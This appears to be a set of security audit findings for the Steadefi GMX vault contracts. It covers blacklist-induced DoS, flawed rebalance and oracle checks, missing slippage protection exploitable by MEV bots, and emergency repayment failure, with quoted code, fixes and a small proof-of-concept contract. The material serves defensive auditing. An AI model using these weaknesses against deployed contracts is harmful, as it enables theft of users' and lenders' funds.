```\\nFile: GMXVault.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n
The transfer of ERC-20 tokens with blacklist functionality in process functions can lead to stuck vaults
medium
A few process functions transfer ERC-20 tokens that could have blacklist functionality. This can lead to a DoS of the strategy vault if, for example, a blacklisted user withdraws funds.\\nSome ERC-20 tokens, for example USDC (which is used by the system), can blacklist specific addresses so that they are no longer able to transfer and receive tokens. Sending funds to these addresses will lead to a revert. A few of the process functions inside the deposit and withdraw contracts transfer ERC-20 tokens to addresses that could potentially be blacklisted. The system is not in an Open state when a keeper bot interacts with such a process function, and if the call to such a function reverts, the status cannot be updated back to Open. Therefore, it will remain in the given status and a DoS for all users occurs. The DoS only ends once the user is no longer blacklisted, which can potentially take forever.\\nThe attack flow (which could be accidental) would, for example, look like this:\\nUSDC-blacklisted user calls withdraw with the wish to withdraw USDC\\nwithdraw function passes and status is updated to GMXTypes.Status.Withdraw\\nKeeper calls the processWithdraw function\\nTransferring USDC tokens to the blacklisted user reverts\\nTherefore the vault is stuck in the GMXTypes.Status.Withdraw status and all users experience a DoS\\nHere are the code snippets of these dangerous transfers inside process functions:\\n```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n\\n```\\nfunction processDepositFailureLiquidityWithdrawal(\\n GMXTypes.Store storage self\\n) public {\\n GMXChecks.beforeProcessAfterDepositFailureLiquidityWithdrawal(self);\\n // rest of code\\n // Refund user the rest of the remaining withdrawn LP assets\\n // Will be in tokenA/tokenB only; so if user deposited LP tokens\\n // they will still be refunded in tokenA/tokenB\\n self.tokenA.safeTransfer(self.depositCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.depositCache.user, self.tokenB.balanceOf(address(this)));\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n}\\n```\\n\\n```\\nfunction processWithdraw(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessWithdrawChecks(self);\\n\\n try GMXProcessWithdraw.processWithdraw(self) {\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n // rest of code\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n \\n // rest of code\\n\\n self.status = GMXTypes.Status.Open;\\n }\\n // rest of code\\n}\\n```\\n
Instead of transferring the ERC-20 tokens directly to a user in the process functions, use a two-step process instead. For example, create another contract whose only purpose is to hold assets and store the information about which address is allowed to withdraw how many of the specified tokens. In the process functions, send the funds to this new contract along with this information instead. So if a user has been blacklisted, the DoS only exists for that specific user and for the rest of the users the system continues to function normally.
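A minimal sketch of such an escrow contract (hypothetical, not part of the Steadefi codebase); the vault's process functions would transfer tokens here and credit the user, who then claims on their own:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\n\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { SafeERC20 } from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";\\n\\ncontract WithdrawEscrow {\\n using SafeERC20 for IERC20;\\n\\n // user => token => amount withdrawable\\n mapping(address => mapping(address => uint256)) public claimable;\\n\\n // called by the vault's process functions after transferring `amt` here;\\n // in production this should be restricted to the vault address\\n function credit(address user, address token, uint256 amt) external {\\n claimable[user][token] += amt;\\n }\\n\\n // a blacklisted user only blocks their own claim, not the whole vault\\n function claim(address token) external {\\n uint256 amt = claimable[msg.sender][token];\\n claimable[msg.sender][token] = 0;\\n IERC20(token).safeTransfer(msg.sender, amt);\\n }\\n}\\n```\\n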
DoS of the entire strategy vault, as the status can no longer be updated to Open until the user is no longer blacklisted. This can potentially take forever and forces the owners to take emergency action.
```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n
Rebalance may occur due to wrong requirements check
low
Before a rebalance can occur, checks are implemented to ensure that `delta` and `debtRatio` remain within their specified limits. However, it's important to note that the check in `GMXChecks::beforeRebalanceChecks` ignores the scenario where these values are equal to any of their limits.\\nIn the current implementation of the `GMXRebalance::rebalanceAdd` function, it first calculates the current values of `debtRatio` and `delta` before making any changes. Subsequently, the `beforeRebalanceChecks` function checks if these values meet the requirements for a rebalance to occur. These requirements dictate that `debtRatio` or `delta` must be greater than or equal to the `UpperLimit`, or less than or equal to the `LowerLimit`, for a rebalance to take place.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n\\nSuppose a rebalance is successful. In the `afterRebalanceChecks` section, the code verifies whether `delta` and `debtRatio` are greater than the `UpperLimit` or less than the `LowerLimit`. This implies that these limits are inclusive, meaning the correct interpretation should be `LowerLimit` ≤ actualValue ≤ `UpperLimit`. It also indicates that for a rebalance to occur, the values of `deltaBefore` and `debtRatioBefore` need to be outside their limits, i.e., `delta` should be greater than `Upper` or less than `Lower`. However, in the current implementation, if these values are equal to a limit, a rebalance may still occur, which is inconsistent with `afterRebalanceChecks`, where the limits are inclusive. 
Consequently, a value equal to a limit needs to be treated as valid and must not trigger a rebalance.\\n```\\nfunction afterRebalanceChecks(\\n GMXTypes.Store storage self\\n) external view {\\n // Guards: check that delta is within limits for Neutral strategy\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n int256 _delta = GMXReader.delta(self);\\n\\n if (\\n _delta > self.deltaUpperLimit ||\\n _delta < self.deltaLowerLimit\\n ) revert Errors.InvalidDelta();\\n }\\n\\n // Guards: check that debt is within limits for Long/Neutral strategy\\n uint256 _debtRatio = GMXReader.debtRatio(self);\\n\\n if (\\n _debtRatio > self.debtRatioUpperLimit ||\\n _debtRatio < self.debtRatioLowerLimit\\n ) revert Errors.InvalidDebtRatio();\\n}\\n```\\n\\nImagine `delta` or `debtRatio` is exactly equal to one of its limits: a rebalance will occur, even though the value is valid because it lies inclusively within the limits.
Rebalance may occur due to wrong requirements check\\nConsider a strict check to determine if `delta` or `debtRatio` is strictly within its limits, including scenarios where they are equal to any of its limits. In such cases, the code should ensure that a rebalance does not occur when these values are precisely at the limit.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n ) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore <= self.deltaUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore >= self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore <= self.debtRatioUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore >= self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n }\\n```\\n
In such a scenario, the system might incorrectly trigger a rebalance of the vault, even when `delta` or `debtRatio` is precisely within the established limits, thus potentially causing unintended rebalancing actions.
```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n
Wrong errors are used for reverts
low
There are checks that revert with wrong errors\\nReverts:\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L68-L69\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L74-L75\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L351-L352\\n```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n
Wrong errors are used for reverts\\nConsider using `Errors.EmptyDepositAmount` for the provided cases.
This can lead to user confusion as they won't receive the accurate revert reason.
```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n
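A minimal sketch of the corrected checks, assuming the `Errors` library already declares (or is extended with) an `EmptyDepositAmount` error:\\n```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.EmptyDepositAmount();\\n\\nif (depositValue == 0)\\n revert Errors.EmptyDepositAmount();\\n\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.EmptyDepositAmount();\\n```\\n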
Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk
low
Users who accumulate more than 2^96 UNI tokens may lose their tokens because transfers above that amount will always revert.\\nThe UNI token contract imposes a transfer limit, restricting the maximum amount of tokens that can be transferred in a single transaction to 2^96 UNI tokens. Any transfer exceeding this threshold will trigger a transaction revert. The contract relies on the `balanceOf` function to verify the sender's token balance before proceeding with a transfer.\\n```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n\\nSuch a transfer will always revert for balances above 2^96 UNI tokens; see https://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfers
Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk\\nContracts should always check the amount of UNI being transferred before processing the transaction.
Users who accumulate more than 2^96 UNI tokens may lose their tokens due to a DOS revert when attempting to withdraw their token balance.
```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n
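A minimal sketch of the recommended guard, using a hypothetical `safeTransferCapped` helper that splits any amount above the UNI-style `2**96 - 1` cap into multiple transfers:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\n\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { SafeERC20 } from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";\\n\\nlibrary SafeCappedTransfer {\\n using SafeERC20 for IERC20;\\n\\n // UNI stores balances as uint96, so a single transfer must stay below 2**96\\n uint256 internal constant TRANSFER_CAP = 2**96 - 1;\\n\\n // Hypothetical helper: chunk transfers that exceed the cap instead of reverting\\n function safeTransferCapped(IERC20 token, address to, uint256 amount) internal {\\n while (amount > TRANSFER_CAP) {\\n token.safeTransfer(to, TRANSFER_CAP);\\n amount -= TRANSFER_CAP;\\n }\\n if (amount > 0) token.safeTransfer(to, amount);\\n }\\n}\\n```\\n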
`emergencyClose()` may fail to repay any debt
medium
The `emergencyClose()` function may become ineffective, preventing the contract from repaying any outstanding debt and leading to potential financial losses.\\nWhen the contract is paused, all the liquidity from GMX is withdrawn (in terms of `tokenA` and tokenB).\\nThe `emergencyClose()` function is called after the contract is paused for some reason, possibly when the strategy incurs bad debts, when the contract gets hacked, during high volatility, and so on.\\nThis function is responsible for repaying all the amounts of `tokenA` and `tokenB` borrowed from the `lendingVault` contract. It then sets the contract's status to `closed`. After that, users who hold `svToken` shares can withdraw the remaining assets from the contract.\\nThe issue with this function lies in its assumptions, which are not accurate. It assumes that the withdrawn amounts from GMX are always sufficient to cover the whole debt.\\n```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n\\nPlease note that `_rp.repayTokenAAmt` and `_rp.repayTokenBAmt` represent the entire debt, and these values remain the same even if a swap is needed.\\nThe function checks if a swap is needed to cover its debt, and here's how it determines whether a swap is required:\\n```\\n function calcSwapForRepay(GMXTypes.Store storage self, GMXTypes.RepayParams memory rp)\\n external\\n view\\n returns (bool, address, address, uint256)\\n {\\n address _tokenFrom;\\n address _tokenTo;\\n uint256 _tokenToAmt;\\n if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n _tokenToAmt = rp.repayTokenAAmt - self.tokenA.balanceOf(address(this));\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else if (rp.repayTokenBAmt > self.tokenB.balanceOf(address(this))) {\\n // If more tokenB is needed for repayment\\n _tokenToAmt = rp.repayTokenBAmt - self.tokenB.balanceOf(address(this));\\n _tokenFrom = address(self.tokenA);\\n _tokenTo = address(self.tokenB);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else {\\n // If there is enough to repay both tokens\\n return (false, address(0), address(0), 0);\\n }\\n }\\n```\\n\\nIn plain English, this function assumes: if the contract's balance of one of the tokens (e.g., tokenA) is insufficient to cover the `tokenA` debt, then the contract's balance of the other token (tokenB) should be greater than the `tokenB` debt, and the value of the remaining `tokenB` balance after paying off the `tokenB` debt should be equal to or greater than the value required to cover the `tokenA` debt.\\nThe two main issues with this assumption are:\\nIf the contract's balance of `tokenFrom` is not enough to be swapped for `_tokenToAmt` of `tokenTo`, the swap will revert, causing the function to revert each time it is called while the balance of `tokenFrom` is insufficient (in most cases in the delta-long strategy, since it only borrows one token). This is highly likely, since emergency closures occur when something detrimental has happened (such as bad debts).\\nThe second issue arises when the balance of tokenFrom (e.g., tokenA) becomes less than `_rp.repayTokenAAmt` after a swap. In this case, the `repay` call will revert when the `lendingVault` contract attempts to `transferFrom` the strategy contract an amount greater than its balance. For example:\\n`tokenA` balance = 100, debtA = 80.\\n`tokenB` balance = 50, debtB = 70.\\nAfter swapping `tokenA` for 20 `tokenB`:\\n`tokenA` balance = 75, debtA = 80: in this case `repay` will keep reverting.\\nSo if the contract accumulates bad debts (in value), the `emergencyClose()` function will always revert, preventing any debt repayment.\\nAnother critical factor to consider is the time between the `pause` action and the emergency `close` action. During periods of high volatility, the `pause` action temporarily halts the contract, but the prices of the two assets may continue to decline. The emergency `close` function can only be triggered by the owner, who operates a time-lock wallet. In the time between the `pause` and `close` actions, the prices may drop significantly, and this condition will be met since a `swap` is needed in almost all cases.
The debt needs to be repaid in the `pause` action, and in the case of `resume`, simply re-borrow again.
The `emergencyClose()` function will consistently fail to repay any debt.\\nLenders may lose all their funds.
```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n
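A minimal sketch of the recommendation, reusing the `GMXManager` helpers shown above and assuming the GMX liquidity-removal callback has already returned `tokenA`/`tokenB` to the vault: repay 100% of the debt as part of the pause flow, so `emergencyClose()` no longer depends on a later swap succeeding.\\n```\\n// Sketch only: repay inside the pause flow (names follow the report's code)\\nGMXTypes.RepayParams memory _rp;\\n(_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18); // 100% of debt\\nGMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\nself.status = GMXTypes.Status.Paused;\\n\\n// On resume, the vault can simply re-borrow and re-add liquidity\\n```\\n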
Missing minimum token amounts in the emergency contract functions allows MEV bots to take advantage of the protocols emergency situation
medium
When an emergency situation arises and the protocol pauses or resumes the operation of the vault, all funds of the vault are removed from GMX or added back to GMX without any protection against slippage. This allows MEV bots to take advantage of the protocol's emergency situation and make huge profits from it.\\nWhen an emergency situation arises, the protocol owners can call the emergencyPause function to remove all the liquidity from GMX:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\nBut the minimum token amounts to receive when removing liquidity are not provided in the RemoveLiquidityParams:\\n```\\nstruct RemoveLiquidityParams {\\n // Amount of lpToken to remove liquidity\\n uint256 lpAmt;\\n // Array of market token in array to swap tokenA to other token in market\\n address[] tokenASwapPath;\\n // Array of market token in array to swap tokenB to other token in market\\n address[] tokenBSwapPath;\\n // Minimum amount of tokenA to receive in token decimals\\n uint256 minTokenAAmt;\\n // Minimum amount of tokenB to receive in token decimals\\n uint256 minTokenBAmt;\\n // Execution fee sent to GMX for removing liquidity\\n uint256 executionFee;\\n}\\n```\\n\\nAs they are not set, the default value 0 (uint256) is used. Therefore, up to 100% slippage is allowed.\\nThe same parameters are also missing when normal operation resumes:\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n}\\n```\\n\\nTherefore, MEV bots could take advantage of the protocol's emergency situation, and as these trades include all funds of the vault, it could lead to a big loss.\\nIgnoring slippage when pausing could be a design choice of the protocol to avoid the possibility of a revert and pause the system as quickly as possible. However, this argument does not apply during the resume.
Implement a custom minMarketTokens parameter, but do not implement the usual slippage calculation, as this could potentially lead to new critical vulnerabilities. If, for example, the reason for the emergency is a no-longer-supported Chainlink feed, the usual slippage calculation would revert and therefore also DoS the emergency close / withdraw flow.
Big loss of funds as all funds of the strategy vault are unprotected against MEV bots.
```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n
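A minimal sketch of the resume path with an owner-supplied floor (the `minMarketTokenAmt` argument here is an assumption, not the protocol's current signature):\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self,\\n uint256 minMarketTokenAmt\\n) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n // Owner-supplied floor instead of an oracle-derived slippage amount,\\n // so a broken price feed cannot brick the emergency flow\\n _alp.minMarketTokenAmt = minMarketTokenAmt;\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n}\\n```\\n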
A bad price can be delivered in ChainlinkARBOracle
low
When `consultIn18Decimals()` is called, a negative value can be returned, because there is no proper validation for a negative response.\\n`ChainlinkARBOracle.sol` has to guarantee that a correct price is delivered. However, there is a potential scenario in which this guarantee can be broken.\\nLet's break down each part of this scenario:\\nWhen `consultIn18Decimals()` is called, it calls `consult()`. This function is in charge of verifying each answer and delivering a price that is not stale, not zero, and non-negative, and of guaranteeing that the sequencer is up.\\nA possible scenario in `consult()`: suppose `chainlinkResponse.answer = x where x > 0` and `prevChainlinkResponse.answer = y where y < 0` (a negative value given by Chainlink).\\n`_chainlinkIsFrozen()` passes correctly.\\n`_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)` evaluates the following functions:\\n`_badChainlinkResponse(currentResponse)` passes correctly.\\n`_badChainlinkResponse(prevResponse)` also passes correctly, because it only checks whether the value is zero, not whether it is negative; see: `if (response.answer == 0) { return true; }`\\n`_badPriceDeviation(currentResponse, prevResponse, token)`: in `if (currentResponse.answer > prevResponse.answer)`, remember `currentResponse.answer = x where x > 0` and `prevResponse.answer = y where y < 0`, so x > y and this branch is taken.\\nFor the evaluation of `_deviation` we have: `_deviation = uint256(currentResponse.answer - prevResponse.answer) * SAFE_MULTIPLIER / uint256(prevResponse.answer);`. Casting the negative `prevResponse.answer` to `uint256` yields a huge denominator, so the result will always be zero. Hence the validation in `_badPriceDeviation` of `_deviation > maxDeviations[token]` always returns `false`, because zero can never be greater than any value of `maxDeviations[token]`, which is of type `uint256`.\\nPOC:\\nThis scenario is illustrated in a minimalist example, which you can use in Remix:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from "@openzeppelin/contracts/utils/math/SafeCast.sol";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n\\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal, uint256 _maxDeviation) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1\\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n }\\n\\n // Calling this returns currentResponse regardless of the maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) {\\n if (_badPriceDeviation(currentResponse, prevResponse)) revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Our scenario: the result is always zero when _prevResponse is negative\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n}\\n```\\n
This behavior can be mitigated by setting the correct conditional:\\n```\\nif (response.answer <= 0) { return true; }\\n```\\n\\nAlso, since `consultIn18Decimals()` is the only function called by the protocol, the visibility of `consult` may be restricted: change it from `public` to `internal`.
High; delivering prices is the base function of the protocol. The answer may differ from what is allowed, because the maximum deviations will not be enforced.
